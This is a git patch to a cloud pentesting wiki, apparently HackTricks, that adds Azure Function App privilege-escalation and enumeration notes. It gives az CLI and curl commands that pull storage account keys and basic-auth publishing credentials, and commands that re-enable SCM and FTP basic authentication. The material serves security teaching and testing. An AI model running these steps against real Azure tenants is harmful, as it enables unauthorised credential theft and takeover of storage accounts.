From 909a3378c2abddd340d7874a7fb9301dbec79a63 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sat, 21 Dec 2024 16:53:47 +0000 Subject: [PATCH] GITBOOK-737: No subject --- .../az-functions-app-privesc.md | 66 +++++++++++++++++++ .../az-services/az-function-apps.md | 35 ++++++++-- 2 files changed, 97 insertions(+), 4 deletions(-) diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md index d92381b4c..f1bbf477c 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md @@ -73,6 +73,72 @@ az functionapp keys set --resource-group --key-name --key ``` {% endcode %} +### Microsoft.Web/sites/config/list/action + +This permission allows to get the environmental variables of a function. Inside these variables it might be possible to find the default env variables **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which actually contains an **account key to access the blob storage of the function with FULL permissions**. + +{% code overflow="wrap" %} +```bash +az functionapp config appsettings list --name --resource-group +``` +{% endcode %} + + + +### `Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)` + +This permissions allows to list all the publishing profiles which basically contains **basic auth credentials**: + +```bash +# Gte creds +az functionapp deployment list-publishing-profiles \ + --name basicauthenabled \ + --resource-group Resource_Group_1 \ + --output json +``` + +* **Method SCM** + +Then, you can access with these **basic auth credentials to the SCM URL** of your function app and get the values of the env variables: + +```bash +# Get env variables values +curl -u ':' \ + https://.scm.azurewebsites.net/api/settings -v +``` + +_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$`._ + +And these env variables contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account. + + + +If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):` + +{% code overflow="wrap" %} +```bash +# Enable basic authentication for SCM +az rest --method PUT \ + --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \ + --body '{ + "properties": { + "allow": true + } + }' + +# Enable basic authentication for FTP +az rest --method PUT \ + --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \ + --body '{ + "properties": { + "allow": true + } + }' +``` +{% endcode %} + + + {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-cloud/azure-security/az-services/az-function-apps.md b/pentesting-cloud/azure-security/az-services/az-function-apps.md index b428b5135..3059c030d 100644 --- a/pentesting-cloud/azure-security/az-services/az-function-apps.md +++ b/pentesting-cloud/azure-security/az-services/az-function-apps.md @@ -48,7 +48,17 @@ This is very interesting from an attackers perspective as **write access over th This is very interesting from an attackers perspective as it might be possible to **pivot to internal networks** from a vulnerable Lambda function exposed to the Internet. {% endhint %} -### **Function Apps support Managed Identities.** +### **Environment Variables** + +it's possible to configure environment variables inside an app. Moreover, by default the env variables **`AzureWebJobsStorage`** and **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** (among others) are created. These are specially interesting because they **contain the account key to control with FULL permissions the storage account containing the data of the application**. + +### **Function Sandbox** + +Inside the sandbox the source code is located in **`/home/site/wwwroot`** in the file **`function_app.py`** (if python is used) the user running the code is **`app`** (without sudo permissions). + + + +### **Managed Identities** Moreover Function App might have certain endpoints that require a certain level of authentication, such as "admin" or "anonymous".\ An attacker could try to access the **anonymous allowed endpoints** to bypass the restrictions and gain access to sensitive data or functionality. @@ -81,10 +91,27 @@ Example to access a function API endpoint using a key: ## Enumeration -```powershell -# Get only Function Apps -Get-AzFunctionApp +{% code overflow="wrap" %} +```bash +# List all the functions +az functionapp list + +# Get info of 1 funciton (although in the list you already get this info) +az functionapp show --name --resource-group + +# Get env variables (and privesc tot he sorage account) +az functionapp config appsettings list --name --resource-group + +# Check if a domain was assigned to a function app +az functionapp config hostname list --webapp-name --resource-group + +# Get SSL certificates +az functionapp config ssl list --resource-group + +# Get network restrictions +az functionapp config access-restriction show --name --resource-group ``` +{% endcode %} ## Privilege Escalation